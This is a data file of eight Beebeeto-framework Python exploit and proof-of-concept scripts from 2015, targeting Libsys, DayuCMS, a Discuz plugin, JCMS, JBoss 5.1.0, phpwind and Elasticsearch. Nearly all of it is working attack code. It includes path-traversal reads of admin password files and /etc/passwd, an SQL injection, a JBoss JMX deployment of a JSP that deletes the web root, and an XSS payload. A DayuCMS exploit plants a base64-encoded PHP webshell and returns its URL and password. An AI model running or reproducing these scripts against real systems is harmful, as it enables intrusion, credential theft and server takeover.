{"create_date": "2015-06-09 16:33:29", "name": "\u6c47\u6587Libsys\u56fe\u4e66\u9986\u7ba1\u7406\u7cfb\u7edf /zplug/ajax_asyn_link.old.php \u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "ko0zhi", "rank": 3, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "Libsys\u6f0f\u6d1e,/zplug/ajax_asyn_link.old.php\u6f0f\u6d1e,php,\u56fe\u4e66\u9986\u7ba1\u7406\u7cfb\u7edf", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0109',\r\n 'name': '\u6c47\u6587Libsys\u56fe\u4e66\u9986\u7ba1\u7406\u7cfb\u7edf /zplug/ajax_asyn_link.old.php \u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e POC',\r\n 'author': 'ko0zhi',\r\n 'create_date': '2015-06-09',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'libsys',\r\n 'vul_version': ['*'],\r\n 'type': 'Arbitrary File Read',\r\n 'tag': ['Libsys\u6f0f\u6d1e', '/zplug/ajax_asyn_link.old.php\u6f0f\u6d1e', 'php', '\u56fe\u4e66\u9986\u7ba1\u7406\u7cfb\u7edf'],\r\n 'desc': '''\r\n \u6c47\u6587\u8f6f\u4ef6Libsys\u56fe\u4e66\u9986\u7ba1\u7406\u7cfb\u7edf\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\uff0c\u53ef\u4ee5\u76f4\u63a5\u83b7\u53d6\u7ba1\u7406\u5458\u8d26\u53f7\uff0c\u5bc6\u7801\u660e\u6587\u3001\u6570\u636e\u5e93\u5bc6\u7801\u660e\u6587\u3001\r\n \u914d\u7f6e\u4fe1\u606f\u7b49\u975e\u5e38\u654f\u611f\u7684\u4fe1\u606f\uff0c\u53ef\u4ee5\u8f7b\u677e\u5b9e\u73b0\u65e0\u4efb\u4f55\u9650\u5236\u83b7\u53d6 WEBSHELL ...\r\n ''',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2014-059850'],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n url = args['options']['target']\r\n verify_url = ('%s/zplug/ajax_asyn_link.old.php?url='\r\n '../admin/opacadminpwd.php') % url\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n req = requests.get(verify_url)\r\n if req.status_code == 200 and '$strPassWdView' in req.content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u6c47\u6587\u8f6f\u4ef6Libsys\u56fe\u4e66\u9986\u7ba1\u7406\u7cfb\u7edf\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\uff0c\u53ef\u4ee5\u76f4\u63a5\u83b7\u53d6\u7ba1\u7406\u5458\u8d26\u53f7\uff0c\u5bc6\u7801\u660e\u6587\u3001\u6570\u636e\u5e93\u5bc6\u7801\u660e\u6587\u3001\u914d\u7f6e\u4fe1\u606f\u7b49\u975e\u5e38\u654f\u611f\u7684\u4fe1\u606f\uff0c\u53ef\u4ee5\u8f7b\u677e\u5b9e\u73b0\u65e0\u4efb\u4f55\u9650\u5236\u83b7\u53d6 WEBSHELL ...", "app_name": "Libsys", "id": "poc-2015-0109", "layer4_protocol": null}
{"create_date": "2015-06-09 16:27:23", "name": "Dayucms & Dircms <=1.526 /pay/order.php \u4ee3\u7801\u6267\u884c\u6f0f\u6d1e POC & Exploit", "level": "\u9ad8\u5371", "batchable": 1, "author": "foundu", "rank": 5, "port": null, "vul_type": "\u4ee3\u7801\u6267\u884c", "tag": "Dircms\u6f0f\u6d1e,Dayucms\u6f0f\u6d1e,/pay/order.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport random\r\nimport base64\r\nimport hashlib\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0108',\r\n 'name': 'Dayucms & Dircms <=1.526 /pay/order.php \u4ee3\u7801\u6267\u884c\u6f0f\u6d1e POC & Exploit',\r\n 'author': 'foundu',\r\n 'create_date': '2015-06-09',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Dayucms',\r\n 'vul_version': ['<=1.526'],\r\n 'type': 'Code Execution',\r\n 'tag': ['Dircms\u6f0f\u6d1e', 'Dayucms\u6f0f\u6d1e', '/pay/order.php', 'php'],\r\n 'desc': '''\r\n DayuCMS\u5728\u5c06\u5b57\u7b26\u4e32\u8f6c\u6362\u4e3a\u6570\u7ec4\u7684\u51fd\u6570\u4e2d\u76f4\u63a5\u5229\u7528eval\uff0c\u5e76\u4e14\u5b58\u5728\u53ef\u63a7\u53d8\u91cf\uff0c\u5bfc\u81f4\u4efb\u610f\u4ee3\u7801\u6267\u884c\u3002\r\n ''',\r\n 'references': ['http://joychou.org/index.php/web/dayucms-1-526-foreground-remote-code-execution.html',\r\n ],\r\n },\r\n }\r\n\r\n @staticmethod\r\n def md5_t(char):\r\n return hashlib.md5(char).hexdigest()\r\n\r\n @classmethod\r\n def dayucms_md5(cls, char):\r\n return cls.md5_t(char)[8:24]\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n ip = '2.2.2.2'\r\n filenum = random.randint(10000, 99999)\r\n filename = base64.b64encode('%d.php' % filenum)\r\n verify_url = '%s/pay/order.php' % args['options']['target']\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n req = requests.get(verify_url)\r\n cookie = req.cookies\r\n for cookie_tuple in cookie.items():\r\n for k in cookie_tuple:\r\n if 'siteid' in k:\r\n cookie_pre = k\r\n break\r\n cookie_key = cls.dayucms_md5('productarray'+ip)\r\n cookie_key = cookie_pre[:-6] + cookie_key\r\n if args['options']['verbose']:\r\n print '[*] XFF is: %s' % ip\r\n print '[*] Cookie_key which need to add is: %s\\n' % cookie_key\r\n vs = 'PD9waHAgdmFyX2R1bXAobWQ1KDEyMykpO3VubGluayhfX0ZJTEVfXyk7'\r\n verify_shell = 'fputs(fopen(base64_decode(%s),w),base64_decode(%s))' % (filename, vs)\r\n verify_shell = '1%3b' + verify_shell\r\n false_headers = {'X-Forwarded-For': ip}\r\n false_cookies = {cookie_key: verify_shell, cookie_pre: '1'}\r\n verify_req = requests.get(verify_url, cookies = false_cookies, headers = false_headers)\r\n verify_shell_url = '%s/pay/%d.php' % (args['options']['target'], filenum)\r\n if '202cb962ac59075b964b07152d234b70' in requests.get(verify_shell_url).content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n @classmethod\r\n def exploit(cls, args):\r\n ip = '2.2.2.2'\r\n filenum = random.randint(10000, 99999)\r\n filename = base64.b64encode('%d.php' % filenum)\r\n verify_url = '%s/pay/order.php' % args['options']['target']\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n req = requests.get(verify_url)\r\n cookie = req.cookies\r\n for cookie_tuple in cookie.items():\r\n for k in cookie_tuple:\r\n if 'siteid' in k:\r\n cookie_pre = k\r\n break\r\n cookie_key = cls.dayucms_md5('productarray'+ip)\r\n cookie_key = cookie_pre[:-6] + cookie_key\r\n if args['options']['verbose']:\r\n print '[*] XFF is: %s' % ip\r\n print '[*] Cookie_key which need to add is: %s\\n' % cookie_key\r\n vs = 'PD9waHAKdmFyX2R1bXAobWQ1KDEyMykpOwphc3NlcnQoCiRfUE9TVFtiZWViZWV0b10KKTs'\r\n webshell = 'fputs(fopen(base64_decode(%s),w),base64_decode(%s))' % (filename, vs)\r\n webshell = '1%3b' + webshell\r\n false_headers = {'X-Forwarded-For': ip}\r\n false_cookies = {cookie_key: webshell, cookie_pre: '1'}\r\n verify_req = requests.get(verify_url, cookies = false_cookies, headers = false_headers)\r\n shell_url = '%s/pay/%d.php' % (args['options']['target'], filenum)\r\n if '202cb962ac59075b964b07152d234b70' in requests.get(shell_url).content:\r\n args['success'] = True\r\n args['poc_ret']['webshell'] = shell_url\r\n args['poc_ret']['password'] = 'beebeeto'\r\n return args\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "DayuCMS\u5728\u5c06\u5b57\u7b26\u4e32\u8f6c\u6362\u4e3a\u6570\u7ec4\u7684\u51fd\u6570\u4e2d\u76f4\u63a5\u5229\u7528eval\uff0c\u5e76\u4e14\u5b58\u5728\u53ef\u63a7\u53d8\u91cf\uff0c\u5bfc\u81f4\u4efb\u610f\u4ee3\u7801\u6267\u884c\u3002", "app_name": "Dayucms", "id": "poc-2015-0108", "layer4_protocol": null}
{"create_date": "2015-06-04 21:15:44", "name": "Discuz \u95ee\u5377\u8c03\u67e5\u63d2\u4ef6 /nds_ques_viewanswer.inc.php SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "1024", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "Discuz\u95ee\u5377\u8c03\u67e5\u4e13\u4e1a\u7248\u63d2\u4ef6\u6ce8\u5165,/nds_ques_viewanswer.inc.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0107',\r\n 'name': 'Discuz \u95ee\u5377\u8c03\u67e5\u63d2\u4ef6 /nds_ques_viewanswer.inc.php SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n 'author': '1024',\r\n 'create_date': '2015-06-04',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Discuz',\r\n 'vul_version': ['*'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['Discuz\u95ee\u5377\u8c03\u67e5\u4e13\u4e1a\u7248\u63d2\u4ef6\u6ce8\u5165', '/nds_ques_viewanswer.inc.php', 'php'],\r\n 'desc': 'Discuz plugin sql injection vulnerability.',\r\n 'references': ['http://0day5.com/archives/3184',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = ('/plugin.php?id=nds_up_ques:nds_ques_viewanswer&srchtxt=1&orderby=dateline'\r\n ' and 1=(updatexml(1,concat(0x27,md5(123)),1))--')\r\n verify_url = args['options']['target'] + payload\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n req = requests.get(verify_url)\r\n if '202cb962ac59075b964b07152d234b70' in req.content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Discuz plugin sql injection vulnerability.", "app_name": "Discuz", "id": "poc-2015-0107", "layer4_protocol": null}
{"create_date": "2015-06-01 17:07:28", "name": "JCMS /opr_readfile.jsp \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "\u5c0f\u9a6c\u7532", "rank": 3, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "JCMS\u6f0f\u6d1e,/opr_readfile.jsp\u6f0f\u6d1e,jsp", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0106',\r\n 'name': 'JCMS /opr_readfile.jsp \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC',\r\n 'author': '\u5c0f\u9a6c\u7532',\r\n 'create_date': '2015-06-01',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'JCMS',\r\n 'vul_version': ['*'],\r\n 'type': 'Arbitrary File Download',\r\n 'tag': ['JCMS\u6f0f\u6d1e', '/opr_readfile.jsp\u6f0f\u6d1e', 'jsp'],\r\n 'desc': '''\r\n \u5927\u6c49\u7248\u901ajcms\u7cfb\u7edf\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\uff0c\u53ef\u4ee5\u76f4\u63a5\u83b7\u53d6\u7ba1\u7406\u5458\u8d26\u53f7\uff0c\u5bc6\u7801\u660e\u6587\u3001\u6570\u636e\u5e93\u5bc6\u7801\u660e\u6587\u3001\r\n \u914d\u7f6e\u4fe1\u606f\u7b49\u975e\u5e38\u654f\u611f\u7684\u4fe1\u606f\uff0c\u53ef\u4ee5\u8f7b\u677e\u5b9e\u73b0\u65e0\u4efb\u4f55\u9650\u5236\u83b7\u53d6 WEBSHELL ...\r\n ''',\r\n 'references': ['http://www.ijindun.com/News/gonggao/2014/1125/178542.html'],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n url = args['options']['target']\r\n verify_url = ('%s/jcms/jcms_files/jcms1/web1/site/module/comment/opr_readfile.jsp?filename='\r\n '../../../../../../WEB-INF/ini/merpserver.ini') % url\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n req = requests.get(verify_url)\r\n if req.status_code == 200 and 'AdminPW' in req.content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u5927\u6c49\u7248\u901ajcms\u7cfb\u7edf\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\uff0c\u53ef\u4ee5\u76f4\u63a5\u83b7\u53d6\u7ba1\u7406\u5458\u8d26\u53f7\uff0c\u5bc6\u7801\u660e\u6587\u3001\u6570\u636e\u5e93\u5bc6\u7801\u660e\u6587\u3001\r\n\u914d\u7f6e\u4fe1\u606f\u7b49\u975e\u5e38\u654f\u611f\u7684\u4fe1\u606f\uff0c\u53ef\u4ee5\u8f7b\u677e\u5b9e\u73b0\u65e0\u4efb\u4f55\u9650\u5236\u83b7\u53d6 WEBSHELL ...", "app_name": "JCMS", "id": "poc-2015-0106", "layer4_protocol": null}
{"create_date": "2015-06-01 16:27:40", "name": "JBoss 5.1.0 DeploymentFileRepository \u4ee3\u7801\u6267\u884c\u6f0f\u6d1e POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "linglin", "rank": 4, "port": null, "vul_type": "\u547d\u4ee4\u6267\u884c", "tag": "JBoss\u6f0f\u6d1e,DeploymentFileRepository,Remot Code Execution", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0105',\r\n 'name': 'JBoss 5.1.0 DeploymentFileRepository \u4ee3\u7801\u6267\u884c\u6f0f\u6d1e POC',\r\n 'author': 'Linglin',\r\n 'create_date': '2015-05-28',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'JBoss',\r\n 'vul_version': ['5.1.0'],\r\n 'type': 'Code Execution',\r\n 'tag': ['JBoss\u6f0f\u6d1e', 'DeploymentFileRepository', 'Remot Code Execution'],\r\n 'desc': 'Jboss5.1.0\u9ed8\u8ba4\u914d\u7f6e\u5141\u8bb8\u76f4\u63a5\u90e8\u7f72\u4ee3\u7801\u5230\u670d\u52a1\u5668\u4e0a\uff0c\u53ef\u4ee5\u6267\u884c\u653b\u51fb\u8005\u63d0\u4f9b\u7684\u4efb\u610f\u4ee3\u7801\u3002',\r\n 'references': ['http://www.securityfocus.com/bid/21219/',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_code = ('\\n<%@ page import=\"java.util.*,java.io.*\" %>\\n<%@ page import=\"'\r\n 'java.io.*\"%>\\n<%\\nString path=request.getRealPath(\"\");\\nout.prin'\r\n 'tln(path);\\nFile d=new File(path);\\nif(d.exists()){\\n d.delete()'\r\n ';\\n }\\n%>\\n<% out.println(\"this_is_not_exist_9.1314923\");%>')\r\n payload = ('action=invokeOp&name=jboss.admin%%3Aservice%%3DDeploymentFileRepositor'\r\n 'y&methodIndex=5&arg0=test.war&arg1=test&arg2=.jsp&arg3=%s&arg4=True')\r\n verify_data = payload % urllib2.quote(verify_code)\r\n verify_url = args['options']['target'] + '/jmx-console/HtmlAdaptor'\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n page_content = ''\r\n request = urllib2.Request(verify_url, verify_data)\r\n response = urllib2.urlopen(request)\r\n page_content = response.read()\r\n if 'this_is_not_exist_9.1314923' in page_content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Jboss5.1.0\u9ed8\u8ba4\u914d\u7f6e\u5141\u8bb8\u76f4\u63a5\u90e8\u7f72\u4ee3\u7801\u5230\u670d\u52a1\u5668\u4e0a\uff0c\u53ef\u4ee5\u6267\u884c\u653b\u51fb\u8005\u63d0\u4f9b\u7684\u4efb\u610f\u4ee3\u7801\u3002", "app_name": "Jboss", "id": "poc-2015-0105", "layer4_protocol": null}
{"create_date": "2015-05-25 10:53:09", "name": "phpwind v8.7 /goto.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "tmp", "rank": 3, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "phpwind\u7cfb\u7edf\u6f0f\u6d1e,/goto.php\u6f0f\u6d1e,phpwind xss\u6f0f\u6d1e,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0104',\r\n 'name': 'phpwind v8.7 /goto.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',\r\n 'author': 'tmp',\r\n 'create_date': '2015-05-25',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'phpwind',\r\n 'vul_version': ['8.7'],\r\n 'type': 'Cross Site Scripting',\r\n 'tag': ['phpwind\u7cfb\u7edf\u6f0f\u6d1e', '/goto.php\u6f0f\u6d1e', 'phpwind xss\u6f0f\u6d1e', 'php'],\r\n 'desc': 'The first programming code flaw occurs at \"&url\" parameter in \"/goto.php?\" page.',\r\n 'references': ['http://seclists.org/fulldisclosure/2015/May/106',],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = '%s/goto.php?url=beebee\"><to>alert(1)</script>.com/' % args['options']['target']\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n req = requests.get(verify_url)\r\n if req.status_code == 200 and 'url=beebee\"><to>alert(1)</script>.com' in req.content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "The first programming code flaw occurs at \"&url\" parameter in \"/goto.php?\" page.", "app_name": "PHPWind", "id": "poc-2015-0104", "layer4_protocol": null}
{"create_date": "2015-05-21 20:32:47", "name": "Elasticsearch < 1.4.5 / < 1.5.2 \u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e Exploit", "level": "\u9ad8\u5371", "batchable": 1, "author": "1024", "rank": 3, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6", "tag": "Elasticsearch\u6f0f\u6d1e,ES \u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e,CVE-2015-3337", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\nimport urlparse\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0103',\r\n 'name': 'Elasticsearch < 1.4.5 / < 1.5.2 \u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e Exploit',\r\n 'author': '1024',\r\n 'create_date': '2015-05-21',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [9200],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Elasticsearch',\r\n 'vul_version': ['1.5.2'],\r\n 'type': 'Arbitrary File Read',\r\n 'tag': ['Elasticsearch\u6f0f\u6d1e', 'ES \u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e', 'CVE-2015-3337'],\r\n 'desc': '''\r\n Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2,\r\n when a site plugin is enabled, allows remote attackers to read arbitrary files via unspecified vectors.\r\n ''',\r\n 'references': [\r\n 'https://www.exploit-db.com/exploits/37054/',\r\n 'https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3337',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def exploit(cls, args):\r\n # Include more plugin names to check if they are installed\r\n pluginList = ['test','kopf', 'HQ', 'marvel', 'bigdesk', 'head']\r\n target = urlparse.urlparse(args['options']['target'])\r\n for plugin in pluginList:\r\n es_test = '%s://%s:9200/_plugin/%s/../../../bin/elasticsearch' % \\\r\n (target.scheme, target.netloc, plugin)\r\n verify_url = '%s://%s:9200/_plugin/%s/../../../../../../etc/passwd' % \\\r\n (target.scheme, target.netloc, plugin)\r\n response = requests.get(es_test, timeout=8, allow_redirects=False)\r\n if \"ES_JAVA_OPTS\" in response.content:\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + es_test\r\n req = requests.get(verify_url, timeout=8)\r\n if req.status_code == 200:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n continue\r\n return args\r\n\r\n verify = exploit\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2,\r\nwhen a site plugin is enabled, allows remote attackers to read arbitrary files via unspecified vectors.", "app_name": "ElasticSearch", "id": "poc-2015-0103", "layer4_protocol": null}
{"create_date": "2015-05-14 11:49:17", "name": "Elasticsearch _river \u672a\u6388\u6743\u8bbf\u95ee\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "foundu", "rank": 3, "port": null, "vul_type": "\u8d8a\u6743\u8bbf\u95ee", "tag": "Elasticsearch\u6f0f\u6d1e,\u672a\u6388\u6743\u8bbf\u95ee\u6f0f\u6d1e,\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\nimport urlparse\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0100',\r\n 'name': 'Elasticsearch _river \u672a\u6388\u6743\u8bbf\u95ee\u6f0f\u6d1e POC',\r\n 'author': 'foundu',\r\n 'create_date': '2015-05-14',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [9200],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Elasticsearch',\r\n 'vul_version': ['*'],\r\n 'type': 'Privilege Escalation',\r\n 'tag': ['Elasticsearch\u6f0f\u6d1e', '\u672a\u6388\u6743\u8bbf\u95ee\u6f0f\u6d1e', '\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e'],\r\n 'desc': 'elasticsearch\u5728\u5b89\u88c5\u4e86river\u4e4b\u540e\u53ef\u4ee5\u540c\u6b65\u591a\u79cd\u6570\u636e\u5e93\u6570\u636e\uff08\u5305\u62ec\u5173\u7cfb\u578b\u7684mysql\u3001mongodb\u7b49\uff09',\r\n 'references': ['http://zone.wooyun.org/content/20297',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n target = urlparse.urlparse(args['options']['target'])\r\n verify_url = '%s://%s:9200/_river/_search' % (target.scheme, target.netloc)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n req = requests.get(verify_url)\r\n if req.status_code == 200 and '_river' in req.content and 'type' in req.content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "elasticsearch\u5728\u5b89\u88c5\u4e86river\u4e4b\u540e\u53ef\u4ee5\u540c\u6b65\u591a\u79cd\u6570\u636e\u5e93\u6570\u636e\uff08\u5305\u62ec\u5173\u7cfb\u578b\u7684mysql\u3001mongodb\u7b49\uff09", "app_name": "ElasticSearch", "id": "poc-2015-0100", "layer4_protocol": null}
